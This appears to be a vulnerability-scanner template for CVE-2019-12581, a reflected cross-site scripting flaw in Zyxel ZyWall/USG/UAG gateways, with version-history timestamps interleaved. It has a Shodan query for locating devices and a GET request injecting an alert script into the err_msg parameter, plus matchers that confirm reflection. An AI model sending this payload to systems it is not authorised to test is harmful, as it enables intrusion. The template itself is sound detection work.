2022-05-28 22:54:42 +00:00
id : CVE-2019-12581
info :
2022-08-12 00:45:50 +00:00
name : Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
2022-05-28 22:54:42 +00:00
author : n -thumann
severity : medium
2022-08-12 00:45:50 +00:00
description : Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
2022-05-28 22:54:42 +00:00
reference :
- https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
- https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
- https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-12581
2022-05-28 22:54:42 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2019-12581
cwe-id : CWE-79
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-05-28 22:54:42 +00:00
shodan-query : http.title:"ZyWall"
tags : cve,cve2019,zyxel,zywall,xss
2023-04-27 04:28:59 +00:00
http :
2022-05-28 22:54:42 +00:00
- method : GET
path :
- "{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "<script>alert(document.domain);</script>"
- "Please contact with administrator."
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200